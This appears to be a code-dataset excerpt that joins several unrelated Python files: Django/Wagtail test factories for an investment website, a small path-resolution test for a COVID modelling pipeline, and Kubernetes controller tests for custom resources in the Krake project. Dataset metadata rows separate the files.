breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
heading_en_gb = factory.fuzzy.FuzzyText(length=100)
sub_heading = factory.fuzzy.FuzzyText(length=100)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
benefits_section_title = factory.fuzzy.FuzzyText(length=10)
sector_title = factory.fuzzy.FuzzyText(length=10)
sector_button_text = factory.fuzzy.FuzzyText(length=10)
sector_button_url = factory.fuzzy.FuzzyText(length=10)
hpo_title = factory.fuzzy.FuzzyText(length=10)
how_we_help_text_one_en_gb = factory.fuzzy.FuzzyText(length=10)
how_we_help_text_two_en_gb = factory.fuzzy.FuzzyText(length=10)
how_we_help_text_three_en_gb = factory.fuzzy.FuzzyText(length=10)
how_we_help_text_four_en_gb = factory.fuzzy.FuzzyText(length=10)
how_we_help_text_five_en_gb = factory.fuzzy.FuzzyText(length=10)
contact_section_title = factory.fuzzy.FuzzyText(length=10)
contact_section_call_to_action_text = factory.fuzzy.FuzzyText(length=10)
contact_section_call_to_action_url = factory.fuzzy.FuzzyText(length=10)
slug = 'invest-home'
parent = None
class InvestHighPotentialOpportunitiesPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.invest.InvestHighPotentialOpportunitiesPage
parent = None
class ForeignDirectInvestmentFormPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.investment_atlas.ForeignDirectInvestmentFormPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
heading = factory.fuzzy.FuzzyText(length=200)
sub_heading = factory.fuzzy.FuzzyText(length=200)
comment_help_text = factory.fuzzy.FuzzyText(length=200)
comment_label = factory.fuzzy.FuzzyText(length=200)
company_name_help_text = factory.fuzzy.FuzzyText(length=200)
company_name_label = factory.fuzzy.FuzzyText(length=200)
company_size_help_text = factory.fuzzy.FuzzyText(length=200)
company_size_label = factory.fuzzy.FuzzyText(length=200)
country_help_text = factory.fuzzy.FuzzyText(length=200)
country_label = factory.fuzzy.FuzzyText(length=200)
email_address_help_text = factory.fuzzy.FuzzyText(length=200)
email_address_label = factory.fuzzy.FuzzyText(length=200)
full_name_help_text = factory.fuzzy.FuzzyText(length=200)
full_name_label = factory.fuzzy.FuzzyText(length=200)
opportunities_help_text = factory.fuzzy.FuzzyText(length=200)
opportunities_label = factory.fuzzy.FuzzyText(length=200)
phone_number_help_text = factory.fuzzy.FuzzyText(length=200)
phone_number_label = factory.fuzzy.FuzzyText(length=200)
role_in_company_help_text = factory.fuzzy.FuzzyText(length=200)
role_in_company_label = factory.fuzzy.FuzzyText(length=200)
website_url_help_text = factory.fuzzy.FuzzyText(length=200)
website_url_label = factory.fuzzy.FuzzyText(length=200)
parent = None
class ForeignDirectInvestmentFormSuccessPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.investment_atlas.ForeignDirectInvestmentFormSuccessPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
heading = factory.fuzzy.FuzzyText(length=200)
sub_heading = factory.fuzzy.FuzzyText(length=200)
next_steps_title = factory.fuzzy.FuzzyText(length=200)
next_steps_body = factory.fuzzy.FuzzyText(length=200)
documents_title = factory.fuzzy.FuzzyText(length=200)
documents_body = factory.fuzzy.FuzzyText(length=200)
parent = None
class InvestHighPotentialOpportunityDetailPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.invest.InvestHighPotentialOpportunityDetailPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
heading = factory.fuzzy.FuzzyText(length=50)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
contact_proposition = factory.fuzzy.FuzzyText(length=50)
contact_button = factory.fuzzy.FuzzyText(length=50)
proposition_one = factory.fuzzy.FuzzyText(length=50)
opportunity_list_title = factory.fuzzy.FuzzyText(length=50)
opportunity_list_item_one = factory.fuzzy.FuzzyText(length=50)
opportunity_list_item_two = factory.fuzzy.FuzzyText(length=50)
opportunity_list_item_three = factory.fuzzy.FuzzyText(length=50)
opportunity_list_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
proposition_two = factory.fuzzy.FuzzyText(length=50)
proposition_two_list_item_one = factory.fuzzy.FuzzyText(length=50)
proposition_two_list_item_two = factory.fuzzy.FuzzyText(length=50)
proposition_two_list_item_three = factory.fuzzy.FuzzyText(length=50)
proposition_two_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
competitive_advantages_title = factory.fuzzy.FuzzyText(length=50)
competitive_advantages_list_item_one = factory.fuzzy.FuzzyText(length=50)
competitive_advantages_list_item_one_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
competitive_advantages_list_item_two = factory.fuzzy.FuzzyText(length=50)
competitive_advantages_list_item_two_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
competitive_advantages_list_item_three = factory.fuzzy.FuzzyText(length=50)
competitive_advantages_list_item_three_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
testimonial = factory.fuzzy.FuzzyText(length=50)
companies_list_text = factory.fuzzy.FuzzyText(length=50)
companies_list_item_image_one = factory.SubFactory(
wagtail_factories.ImageFactory
)
companies_list_item_image_two = factory.SubFactory(
wagtail_factories.ImageFactory
)
companies_list_item_image_three = factory.SubFactory(
wagtail_factories.ImageFactory
)
companies_list_item_image_four = factory.SubFactory(
wagtail_factories.ImageFactory
)
companies_list_item_image_five = factory.SubFactory(
wagtail_factories.ImageFactory
)
companies_list_item_image_six = factory.SubFactory(
wagtail_factories.ImageFactory
)
companies_list_item_image_seven = factory.SubFactory(
wagtail_factories.ImageFactory
)
companies_list_item_image_eight = factory.SubFactory(
wagtail_factories.ImageFactory
)
case_study_list_title = factory.fuzzy.FuzzyText(length=50)
case_study_one_text = factory.fuzzy.FuzzyText(length=50)
case_study_one_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
case_study_two_text = factory.fuzzy.FuzzyText(length=50)
case_study_two_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
case_study_three_text = factory.fuzzy.FuzzyText(length=50)
case_study_three_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
case_study_four_text = factory.fuzzy.FuzzyText(length=50)
case_study_four_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
other_opportunities_title = factory.fuzzy.FuzzyText(length=50)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
class InvestRegionPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.invest.InvestRegionPage
description_en_gb = factory.fuzzy.FuzzyText(length=100)
heading_en_gb = factory.fuzzy.FuzzyText(length=100)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
pullout_text_en_gb = factory.fuzzy.FuzzyText(length=10)
pullout_stat_en_gb = factory.fuzzy.FuzzyText(length=10)
pullout_stat_text_en_gb = factory.fuzzy.FuzzyText(length=10)
subsection_title_one_en_gb = factory.fuzzy.FuzzyText(length=10)
subsection_content_one_en_gb = factory.fuzzy.FuzzyText(length=10)
subsection_title_two_en_gb = factory.fuzzy.FuzzyText(length=10)
subsection_content_two_en_gb = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
class InvestRegionLandingPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.invest.InvestRegionLandingPage
heading_en_gb = factory.fuzzy.FuzzyText(length=100)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
class InternationalTradeHomePageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.find_a_supplier.InternationalTradeHomePage
hero_text_en_gb = factory.fuzzy.FuzzyText(length=255)
breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
search_field_placeholder_en_gb = factory.fuzzy.FuzzyText(length=255)
search_button_text_en_gb = factory.fuzzy.FuzzyText(length=255)
proposition_text_en_gb = factory.fuzzy.FuzzyText(length=255)
call_to_action_text_en_gb = factory.fuzzy.FuzzyText(length=255)
industries_list_text_en_gb = factory.fuzzy.FuzzyText(length=255)
industries_list_call_to_action_text_en_gb = factory.fuzzy.FuzzyText(
length=255
)
services_list_text_en_gb = factory.fuzzy.FuzzyText(length=255)
services_column_one_en_gb = factory.fuzzy.FuzzyText(length=255)
services_column_two_en_gb = factory.fuzzy.FuzzyText(length=255)
services_column_three_en_gb = factory.fuzzy.FuzzyText(length=255)
services_column_four_en_gb = factory.fuzzy.FuzzyText(length=255)
services_column_one_icon_en_gb = factory.SubFactory(
wagtail_factories.ImageFactory
)
services_column_two_icon_en_gb = factory.SubFactory(
wagtail_factories.ImageFactory
)
services_column_three_icon_en_gb = factory.SubFactory(
wagtail_factories.ImageFactory
)
services_column_four_icon_en_gb = factory.SubFactory(
wagtail_factories.ImageFactory
)
search_description_en_gb = factory.fuzzy.FuzzyText(length=255)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
class InternationalTradeIndustryContactPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.find_a_supplier.InternationalTradeIndustryContactPage
breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
introduction_text_en_gb = factory.fuzzy.FuzzyText(length=255)
submit_button_text_en_gb = factory.fuzzy.FuzzyText(length=100)
success_message_text_en_gb = factory.fuzzy.FuzzyText(length=255)
success_back_link_text_en_gb = factory.fuzzy.FuzzyText(length=100)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
class AboutDitServicesPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.great_international.AboutDitServicesPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class AboutUkLandingPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.great_international.AboutUkLandingPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class AboutUkRegionListingPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.AboutUkRegionListingPage
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class AboutUkRegionPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.AboutUkRegionPage
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
featured_description = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class AboutUkWhyChooseTheUkPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.great_international.AboutUkWhyChooseTheUkPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class CapitalInvestContactFormPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.capital_invest.CapitalInvestContactFormPage
heading = factory.fuzzy.FuzzyText(length=50)
intro = factory.fuzzy.FuzzyText(length=50)
cta_text = factory.fuzzy.FuzzyText(length=50)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class CapitalInvestContactFormSuccessPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.capital_invest.CapitalInvestContactFormSuccessPage
message_box_heading = factory.fuzzy.FuzzyText(length=50)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class PlanningStatusFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.investment_atlas.PlanningStatus
name = factory.fuzzy.FuzzyText(length=30)
verbose_description = factory.fuzzy.FuzzyText(length=200)
class InvestmentTypeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.investment_atlas.InvestmentType
name = factory.fuzzy.FuzzyText(length=30)
class InvestmentOpportunityPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.investment_atlas.InvestmentOpportunityPage
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
priority_weighting = '0.0'
strapline = factory.fuzzy.FuzzyText(length=200)
introduction = factory.fuzzy.FuzzyText(length=300)
opportunity_summary = factory.fuzzy.FuzzyText(length=300)
hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
intro_image = factory.SubFactory(wagtail_factories.ImageFactory)
location = factory.fuzzy.FuzzyText(length=200)
promoter = factory.fuzzy.FuzzyText(length=200)
scale = factory.fuzzy.FuzzyText(length=255)
scale_value = factory.fuzzy.FuzzyDecimal(low=1, high=99999)
planning_status = factory.SubFactory(PlanningStatusFactory)
investment_type = factory.SubFactory(InvestmentTypeFactory)
time_to_investment_decision = models.investment_atlas.TIME_TO_INVESTMENT_DECISION_0M_6M
# Streamfields - set them in the instance
# main_content
# regions_with_location - Added as streamfields which holds regions and map coordinates
class InvestmentOpportunityRelatedSectorsFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.investment_atlas.InvestmentOpportunityRelatedSectors
page = None
related_sector = None
class InvestmentOpportunityListingPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.investment_atlas.InvestmentOpportunityListingPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
search_results_title = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
hero_text = factory.fuzzy.FuzzyText(length=50)
contact_cta_title = factory.fuzzy.FuzzyText(length=50)
contact_cta_text = factory.fuzzy.FuzzyText(length=50)
contact_cta_link = 'https://example.com/test/cta/'
parent = None
class InvestmentAtlasLandingPageFactory(wagtail_factories.PageFactory):
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
parent = None
class Meta:
model = models.investment_atlas.InvestmentAtlasLandingPage
class ReusableContentSectionFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.investment_atlas.ReusableContentSection
title = factory.fuzzy.FuzzyText(length=10)
block_slug = factory.fuzzy.FuzzyText(length=10)
# content is a StreamField, so easier to set in the test
class InternationalInvestmentSectorPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalInvestmentSectorPage
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
intro_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
heading = factory.fuzzy.FuzzyText(length=10)
class InternationalInvestmentSubSectorPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalInvestmentSubSectorPage
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
heading = factory.fuzzy.FuzzyText(length=10)
| 38.763039
| 91
| 0.759689
| 4,062
| 34,189
| 6.148449
| 0.074348
| 0.132132
| 0.228709
| 0.294054
| 0.847367
| 0.832633
| 0.784104
| 0.705866
| 0.621982
| 0.498939
| 0
| 0.035001
| 0.147621
| 34,189
| 881
| 92
| 38.807037
| 0.822009
| 0.006757
| 0
| 0.549784
| 0
| 0
| 0.018968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002886
| false
| 0
| 0.010101
| 0
| 0.760462
| 0.017316
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
afe79ebd3db69c28a2acaa8fc86ff8b01225e595
| 1,152
|
py
|
Python
|
tests/lib/cli_tools/test_utilities.py
|
yukgu/covid-model-seiir-pipeline
|
3433034d3f089938e7993b6321d570365bdf62db
|
[
"BSD-3-Clause"
] | 23
|
2020-05-25T00:20:32.000Z
|
2022-01-18T10:32:09.000Z
|
tests/lib/cli_tools/test_utilities.py
|
yukgu/covid-model-seiir-pipeline
|
3433034d3f089938e7993b6321d570365bdf62db
|
[
"BSD-3-Clause"
] | 15
|
2020-06-15T16:34:22.000Z
|
2021-08-15T22:11:37.000Z
|
tests/lib/cli_tools/test_utilities.py
|
yukgu/covid-model-seiir-pipeline
|
3433034d3f089938e7993b6321d570365bdf62db
|
[
"BSD-3-Clause"
] | 11
|
2020-05-24T21:57:29.000Z
|
2021-09-07T18:21:15.000Z
|
from pathlib import Path
from covid_shared import paths
from covid_model_seiir_pipeline.lib.cli_tools.utilities import (
get_input_root
)
def test_get_input_root():
p = get_input_root(None, None, paths.SEIR_FINAL_OUTPUTS)
assert p == (paths.SEIR_FINAL_OUTPUTS / paths.BEST_LINK).resolve()
p = get_input_root(None, 'my_test_root', paths.SEIR_FINAL_OUTPUTS)
assert p == (paths.SEIR_FINAL_OUTPUTS / 'my_test_root').resolve()
p = get_input_root('my_cli_test_root', None, paths.SEIR_FINAL_OUTPUTS)
assert p == (paths.SEIR_FINAL_OUTPUTS / 'my_cli_test_root').resolve()
p = get_input_root('my_cli_test_root', 'my_test_root', paths.SEIR_FINAL_OUTPUTS)
assert p == (paths.SEIR_FINAL_OUTPUTS / 'my_cli_test_root').resolve()
p = get_input_root(None, '/my/full/test/root', paths.SEIR_FINAL_OUTPUTS)
assert p == Path('/my/full/test/root')
p = get_input_root('/my/full/cli/test/root', None, paths.SEIR_FINAL_OUTPUTS)
assert p == Path('/my/full/cli/test/root')
p = get_input_root('/my/full/cli/test/root', '/my/full/test/root', paths.SEIR_FINAL_OUTPUTS)
assert p == Path('/my/full/cli/test/root')
| 37.16129
| 96
| 0.725694
| 186
| 1,152
| 4.145161
| 0.16129
| 0.145266
| 0.199741
| 0.299611
| 0.818418
| 0.79118
| 0.79118
| 0.754864
| 0.754864
| 0.754864
| 0
| 0
| 0.136285
| 1,152
| 30
| 97
| 38.4
| 0.774874
| 0
| 0
| 0.2
| 0
| 0
| 0.210069
| 0.076389
| 0
| 0
| 0
| 0
| 0.35
| 1
| 0.05
| false
| 0
| 0.15
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
affcaffeebd4a9242f22c3786b08500e7d011099
| 38,728
|
py
|
Python
|
krake/tests/controller/kubernetes/test_custom_resource.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1
|
2020-05-29T08:43:32.000Z
|
2020-05-29T08:43:32.000Z
|
krake/tests/controller/kubernetes/test_custom_resource.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | null | null | null |
krake/tests/controller/kubernetes/test_custom_resource.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1
|
2019-11-19T13:39:02.000Z
|
2019-11-19T13:39:02.000Z
|
from textwrap import dedent
import pytest
from aiohttp import web
from copy import deepcopy
import json
import pytz
import yaml
from krake.api.app import create_app
from krake.controller.kubernetes.client import InvalidCustomResourceDefinitionError
from krake.controller.kubernetes.kubernetes import ResourceDelta
from krake.data.core import resource_ref
from krake.data.kubernetes import Application, ApplicationState
from krake.controller.kubernetes import KubernetesController, KubernetesClient
from krake.client import Client
from krake.test_utils import server_endpoint
from tests.controller.kubernetes import crontab_crd, create_cron_resource
from tests.factories.fake import fake
from tests.factories.kubernetes import (
ApplicationFactory,
ClusterFactory,
make_kubeconfig,
)
# snake_case response
crontab_response = yaml.safe_load(
"""
---
api_version: stable.example.com/v1
kind: CronTab
metadata:
creation_timestamp: "2017-05-31T12:56:35Z"
generation: 1
name: cron
namespace: default
resource_version: "285"
uid: 9423255b-4600-11e7-af6a-28d2447dc82b
spec:
cron_spec: '* * * * 5'
image: cron-image
"""
)
async def test_custom_resource_cached_property_called_once(
aiohttp_server, config, db, loop
):
"""Test case if the `customresourcedefinitions` endpoint is called only once,
if the application contains multiple custom resources with the same kind,
but different content
"""
only_once = True
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
nonlocal only_once
assert only_once, "Function should only be called only once"
if only_once:
only_once = False
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd()),
content_type="application/json",
)
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller checks if the CronTabs already exists.
@routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
async def _(request):
return web.Response(status=404)
# As part of the reconciliation, the k8s controller creates the CronTabs
@routes.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
async def _(request):
rd = await request.read()
app = json.loads(rd)
# Craft a response to be used by the Hooks
resp = deepcopy(crontab_response)
resp["metadata"]["name"] = app["metadata"]["name"]
resp["spec"]["image"] = app["spec"]["image"]
resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]
return web.json_response(resp)
kubernetes_app = web.Application()
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.PENDING,
status__scheduled_to=resource_ref(cluster),
status__is_scheduled=False,
spec__manifest=[
create_cron_resource("cron1", image="cron-image-1"),
create_cron_resource("cron2", minute=10, image="cron-image-2"),
],
)
await db.put(cluster)
await db.put(app)
api_server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(api_server), loop=loop) as client:
controller = KubernetesController(server_endpoint(api_server), worker_count=0)
await controller.prepare(client)
# The resource is received by the controller, which starts the reconciliation
# loop, and updates the application in the DB accordingly.
await controller.resource_received(app)
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored.status.last_applied_manifest == app.spec.manifest
# The resource doesn't contain any list (therefore no special control dictionary is
# present in last_observed_manifest), and no custom observer_schema is used
# (therefore all fields present in spec.manifest are observed). In this specific
# case, the last_observed_manifest should be equal to spec.manifest
assert stored.status.last_observed_manifest == app.spec.manifest
assert stored.status.state == ApplicationState.RUNNING
assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_custom_resource_cached_property(aiohttp_server):
"""Test case if two clusters uses two different CRD, but with the exact same name"""
crd_name = "crontabs.stable.example.com"
cluster_a_name = "cluster_a"
cluster_b_name = "cluster_b"
routes_a = web.RouteTableDef()
routes_b = web.RouteTableDef()
routes_common = web.RouteTableDef()
def get_crd(cluster_name):
return web.Response(
status=200,
body=json.dumps(
{
"api_version": "apiextensions.k8s.io/v1beta1",
"kind": "CustomResourceDefinition",
"metadata": {"clusterName": cluster_name},
"spec": {
"group": "stable.example.com",
"names": {"kind": "CronTab", "plural": "crontabs"},
"scope": "Namespaced",
"versions": [
{"name": "v1", "served": "True", "storage": "True"}
],
},
}
),
content_type="application/json",
)
# Determine scope, version, group and plural of custom resource definition
@routes_a.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == crd_name:
return get_crd(cluster_a_name)
return web.Response(status=404)
@routes_b.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == crd_name:
return get_crd(cluster_b_name)
return web.Response(status=404)
@routes_common.get("/apis/stable.example.com/v1/namespaces/default/crontabs/cron")
async def _(request):
return web.Response(status=404)
@routes_common.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
async def _(request):
return web.Response(status=200)
async def make_kubernetes_api(cluster):
kubernetes_app = web.Application()
routes = routes_a if cluster == cluster_a_name else routes_b
kubernetes_app.add_routes(routes)
kubernetes_app.add_routes(routes_common)
return await aiohttp_server(kubernetes_app)
kubernetes_server_a = await make_kubernetes_api(cluster=cluster_a_name)
kubernetes_server_b = await make_kubernetes_api(cluster=cluster_b_name)
# Clusters uses two different CRD, but with the exact same name
cluster_a = ClusterFactory(
metadata__name=cluster_a_name,
spec__kubeconfig=make_kubeconfig(kubernetes_server_a),
spec__custom_resources=[crd_name],
)
cluster_b = ClusterFactory(
metadata__name=cluster_b_name,
spec__kubeconfig=make_kubeconfig(kubernetes_server_b),
spec__custom_resources=[crd_name],
)
for cluster in cluster_a, cluster_b:
app = ApplicationFactory(
status__state=ApplicationState.PENDING,
status__scheduled_to=resource_ref(cluster),
status__is_scheduled=False,
status__last_applied_manifest=[create_cron_resource()],
spec__manifest=[create_cron_resource()],
spec__observer_schema=list(
yaml.safe_load_all(
dedent(
"""
---
apiVersion: stable.example.com/v1
kind: CronTab
metadata:
name: cron
namespace: null
spec:
cronSpec: null
image: null
"""
)
)
),
)
async with KubernetesClient(
cluster.spec.kubeconfig, cluster.spec.custom_resources
) as kube:
delta = ResourceDelta.calculate(app)
for new in delta.new:
await kube.apply(new)
custom_resource_apis = await kube.custom_resource_apis
assert (
custom_resource_apis["CronTab"].metadata.cluster_name
== cluster.metadata.name
)
async def test_app_custom_resource_creation(aiohttp_server, config, db, loop):
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd()),
content_type="application/json",
)
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller checks if a CronTab named `cron` already exists.
@routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/cron")
async def _(request):
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller creates the CronTab named `cron`.
@routes.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
async def _(request):
return web.json_response(crontab_response)
kubernetes_app = web.Application()
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.PENDING,
status__scheduled_to=resource_ref(cluster),
status__is_scheduled=False,
spec__manifest=[create_cron_resource()],
)
await db.put(cluster)
await db.put(app)
api_server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(api_server), loop=loop) as client:
controller = KubernetesController(server_endpoint(api_server), worker_count=0)
await controller.prepare(client)
# The resource is received by the controller, which starts the reconciliation
# loop, and updates the application in the DB accordingly.
await controller.resource_received(app)
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored.status.last_applied_manifest == app.spec.manifest
# The resource doesn't contain any list (therefore no special control dictionary is
# present in last_observed_manifest), and no custom observer_schema is used
# (therefore all fields present in spec.manifest are observed). In this specific
# case, the last_observed_manifest should be equal to spec.manifest
assert stored.status.last_observed_manifest == app.spec.manifest
assert stored.status.state == ApplicationState.RUNNING
assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_update(aiohttp_server, config, db, loop):
"""Test the update of a running application using CRD
The Kubernetes Controller should patch the application and update the DB.
"""
routes = web.RouteTableDef()
deleted = set()
patched = set()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd()),
content_type="application/json",
)
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
